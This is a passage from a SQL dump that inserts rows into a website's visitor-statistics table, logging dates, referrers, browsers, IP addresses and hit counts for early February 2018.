ttps://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',1,0),(18692,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.203','000',1,0),(18693,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(18694,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',1,0),(18695,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.206','000',1,0),(18696,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.93','000',1,0),(18697,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',1,0),(18698,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(18699,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',1,0),(18700,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',2,0),(18701,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',2,0),(18702,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',1,0),(18703,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',1,0),(18704,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.16','000',1,0),(18705,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.155','000',1,0),(18706,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.211','000',2,0),(18707,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.19','000',1,0);
INSERT INTO `lwz_statistics_visitor` VALUES (18708,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.25','000',1,0),(18709,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.132','000',1,0),(18710,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',1,0),(18711,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(18712,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',1,0),(18713,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',2,0),(18714,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',2,0),(18715,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',1,0),(18716,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(18717,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(18718,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',3,0),(18719,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',1,0),(18720,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',3,0),(18721,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(18722,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(18723,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',2,0),(18724,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',1,0),(18725,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(18726,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',2,0),(18727,'2018-02-02','https://www.google.com/','Safari','iPhone','11.0','','198.14.235.92','000',3,0),(18728,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',2,0),(18729,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',1,0),(18730,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.206','000',2,0),(18731,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.42','000',1,0),(18732,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.25','000',2,0),(18733,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.22','000',2,0),(18734,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.115','000',1,0),(18735,'2018-02-02','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(18736,'2018-02-02','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(18737,'2018-02-02','https://zphiblgz.org/scholarship/recommendation/','Safari','iPad','11.0','','68.134.9.53','000',2,0),(18738,'2018-02-02','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.28','000',1,0),(18739,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',1,0),(18740,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(18741,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',3,0),(18742,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',1,0),(18743,'2018-02-02','https://zphiblgz.org/','Chrome','Linux','51.0.2704.106','','179.218.176.52','000',2,0),(18744,'2018-02-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(18745,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',3,0),(18746,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',2,0),(18747,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',2,0),(18748,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(18749,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(18750,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(18751,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',1,0),(18752,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(18753,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.182','000',1,0),(18754,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(18755,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',2,0),(18756,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','1.215.246.146','000',2,0),(18757,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(18758,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',1,0),(18759,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(18760,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',2,0),(18761,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',1,0),(18762,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(18763,'2018-02-02','https://zphiblgz.org','Safari','Linux','538.1','','192.227.205.72','000',2,0),(18764,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',2,0),(18765,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',2,0),(18766,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',2,0),(18767,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',2,0),(18768,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(18769,'2018-02-02','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.58','000',3,0),(18770,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',2,0),(18771,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(18772,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(18773,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(18774,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',2,0),(18775,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',3,0),(18776,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(18777,'2018-02-02','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','39.45.112.159','000',3,0),(18778,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',3,0),(18779,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',2,0),(18780,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',3,0),(18781,'2018-02-03','https://www.google.com.pk/','Chrome','Windows','63.0.3239.132','','39.45.112.159','000',2,0),(18782,'2018-02-03','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(18783,'2018-02-03','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.28','000',1,0),(18784,'2018-02-03','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(18785,'2018-02-03','https://zphiblgz.org/','Safari','Macintosh','10.1.2','','125.27.48.214','000',1,0),(18786,'2018-02-03','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.10','000',1,0),(18787,'2018-02-03','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','66.240.192.138','000',1,0),(18788,'2018-02-03','https://www.google.co.jp/','Firefox','Windows','58.0','','106.181.71.245','000',2,0),(18789,'2018-02-03','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',4,0),(18790,'2018-02-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(18791,'2018-02-03','https://zphiblgz.org','Firefox','Windows','40.1','','61.0.219.245','000',2,0),(18792,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','54.247.187.243','000',1,0),(18793,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.24','000',2,0),(18794,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.117','000',1,0),(18795,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.135','000',2,0),(18796,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',1,0),(18797,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','81.169.144.135','000',2,0),(18798,'2018-02-03','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','108.50.198.8','000',8,0),(18799,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',1,0),(18800,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',5,0),(18801,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',3,0),(18802,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(18803,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',1,0),(18804,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',1,0),(18805,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',2,0),(18806,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(18807,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(18808,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(18809,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','204.197.240.82','000',1,0),(18810,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',3,0),(18811,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.150','000',2,0),(18812,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.17','000',1,0),(18813,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.209','000',1,0),(18814,'2018-02-03','https://zphiblgz.org/scholarship/','Chrome','Windows','63.0.3239.132','','71.121.235.128','000',1,0),(18815,'2018-02-03','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.93','000',1,0),(18816,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',2,0),(18817,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',4,0),(18818,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',2,0),(18819,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(18820,'2018-02-03','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.148','000',1,0),(18821,'2018-02-03','https://zphiblgz.org','CakePHP','Unknown','Unknown','','133.18.52.162','000',1,0),(18822,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',1,0),(18823,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',1,0),(18824,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',3,0),(18825,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(18826,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(18827,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(18828,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',2,0),(18829,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',1,0),(18830,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(18831,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.141','000',1,0),(18832,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',1,0),(18833,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',2,0),(18834,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',1,0),(18835,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(18836,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.84','000',1,0),(18837,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.140','000',1,0),(18838,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.152','000',2,0),(18839,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.229','000',1,0),(18840,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(18841,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(18842,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',2,0),(18843,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',2,0),(18844,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(18845,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',1,0),(18846,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',2,0),(18847,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',2,0),(18848,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',1,0),(18849,'2018-02-03','http://zphiblgz.org/event/ms-walk-2017/','Firefox','Windows','35.0','','146.185.223.150','000',4,0),(18850,'2018-02-03','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','146.185.223.150','000',1,0),(18851,'2018-02-03','https://zphiblgz.org','xpymep','Unknown','Unknown','','146.185.223.150','000',1,0),(18852,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',2,0),(18853,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(18854,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',1,0),(18855,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',2,0),(18856,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',3,0),(18857,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.52','000',3,0),(18858,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',1,0),(18859,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',2,0),(18860,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.90','000',1,0),(18861,'2018-02-03','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(18862,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',3,0),(18863,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',2,0),(18864,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',2,0),(18865,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.86','000',1,0),(18866,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',3,0),(18867,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(18868,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.81','000',1,0),(18869,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',2,0),(18870,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',2,0),(18871,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',2,0),(18872,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',2,0),(18873,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',1,0),(18874,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(18875,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(18876,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.120','000',2,0),(18877,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(18878,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.92','000',2,0),(18879,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.195','000',1,0),(18880,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(18881,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.58','000',1,0),(18882,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.27','000',1,0),(18883,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',3,0),(18884,'2018-02-03','https://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','77.120.125.23','000',2,0),(18885,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.119','000',1,0),(18886,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',1,0),(18887,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.55','000',1,0),(18888,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.168','000',1,0),(18889,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',1,0),(18890,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.16','000',2,0),(18891,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(18892,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',2,0),(18893,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',1,0),(18894,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(18895,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.90','000',1,0),(18896,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.113','000',1,0),(18897,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',1,0),(18898,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',1,0),(18899,'2018-02-03','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1686.YUW3kVAWgkEcm9AgYdyUaDN7wNvVNcU9oTqWwNtZ1Uv8sTgWF18calXAyBBR5PaK.896ed5867a5db82e1734a72dada2c7494bc48bb3&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxYZ2xsMVE0RVN0Y3pVYlEyemF2QU5NcFJKLW9EUDBpdFFPajlwcVJTX2F6eGpMSUFUQ2tFY3hCLVhhNWVpeUlyWnoxdVVoNVloZ2c&b64e=2&sign=b12a06da08ca3610a098f236df5edecb&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93Xfrtkbar-3HYsJA_S1Ul97YYQnRCq3CHAiYAd2GC1tAfWTpfZqmqLKe3C9YzngibEQcu6ps_zG8IWQfyaXWzhjq5xHLGFzrSz-QrDAtC2cnjMaXXBa6IVxIIKhBcw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjtJSZ5JBnOus4E_nFoJVEDVMtwS5XoN7qVSX3q5ew74vbm_1Pghq6Y7GvpqVJW1Jpg&l10n=ru&cts=1517686055164&mc=6.2582440149','MSIE','Windows','10.0','','5.35.58.219','000',1,0),(18900,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',1,0),(18901,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(18902,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(18903,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',1,0),(18904,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',2,0),(18905,'2018-02-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(18906,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(18907,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',2,0),(18908,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(18909,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.129','000',1,0),(18910,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.182','000',1,0),(18911,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',1,0),(18912,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',2,0),(18913,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.89','000',1,0),(18914,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.16','000',1,0),(18915,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',1,0),(18916,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','77.120.109.101','000',2,0),(18917,'2018-02-03','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.107','000',1,0),(18918,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.203','000',1,0),(18919,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.146','000',1,0),(18920,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',1,0),(18921,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.118','000',1,0),(18922,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.184','000',1,0),(18923,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.225','000',2,0),(18924,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',1,0),(18925,'2018-02-03','https://zphiblgz.org/','Firefox','Windows','36.0','','5.35.67.28','000',2,0),(18926,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(18927,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',2,0),(18928,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(18929,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(18930,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(18931,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',1,0),(18932,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',3,0),(18933,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',2,0),(18934,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(18935,'2018-02-03','https://zphiblgz.org','Go--client','Unknown','2.0','','34.227.75.74','000',1,0),(18936,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',3,0),(18937,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',2,0),(18938,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',1,0),(18939,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',1,0),(18940,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(18941,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(18942,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',2,0),(18943,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','77.243.126.231','000',2,0),(18944,'2018-02-03','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(18945,'2018-02-03','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(18946,'2018-02-03','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(18947,'2018-02-03','http://zphiblgz.org/','MSIE','Windows','11.0','','192.40.95.28','000',1,0),(18948,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.134','000',1,0),(18949,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.21','000',2,0),(18950,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.69','000',2,0),(18951,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',2,0),(18952,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',2,0),(18953,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',1,0),(18954,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(18955,'2018-02-03','https://zphiblgz.org','Safari','iPad','11.0','','71.179.11.101','000',3,0),(18956,'2018-02-03','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','193.95.144.5','000',3,0),(18957,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(18958,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',3,0),(18959,'2018-02-03','https://zphiblgz.org','Un